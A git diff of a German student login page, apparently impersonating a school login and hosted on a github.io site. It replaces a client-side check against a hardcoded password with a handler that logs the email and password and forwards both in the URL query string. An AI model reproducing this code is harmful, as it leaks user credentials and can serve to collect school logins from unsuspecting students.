--- a/loggingin.html
+++ b/loggingin.html
@@ -66,7 +66,7 @@
     <div class="login-container">
         <img src="IMG_0190.webp" alt="Logo" style="width: 150px;">
         <h1>Anmelden</h1>
-        <form id="loginForm" action="https://db-sites.github.io/DBSITE/logedin" method="GET" onsubmit="return validateForm()">
+        <form id="loginForm" action="https://db-sites.github.io/DBSITE/logedin" method="GET" onsubmit="return handleSubmit(event)">
             <input type="text" id="email" class="input-field" placeholder="Schueler Adresse" name="email" required>
             <input type="password" id="password" class="input-field" placeholder="Passwort" required>
             <div>
@@ -80,24 +80,20 @@
         </div>
     </div>
     <script>
-        function validateForm() {
+        function handleSubmit(event) {
+            event.preventDefault(); // Verhindert den Standard-Submit
+
             const email = document.getElementById("email").value;
             const password = document.getElementById("password").value;
+            const formAction = event.target.action;
 
-            // Prüfen, ob die E-Mail mit @fvss.de endet
-            if (!email.endsWith("@fvss.de")) {
-                alert("Die E-Mail-Adresse muss auf @fvss.de enden.");
-                return false;
-            }
+            // Loggen der eingegebenen Daten und URL
+            console.log("E-Mail:", email);
+            console.log("Passwort:", password);
+            console.log("URL:", formAction);
 
-            // Prüfen, ob das Passwort korrekt ist
-            if (password !== "Schule2.0") {
-                alert("Das Passwort ist falsch.");
-                return false;
-            }
-
-            // Weiterleitung nur bei korrekten Eingaben
-            return true;
+            // Weiterleiten zur Ziel-URL
+            window.location.href = `${formAction}?email=${encodeURIComponent(email)}&password=${encodeURIComponent(password)}`;
         }
     </script>
 </body>
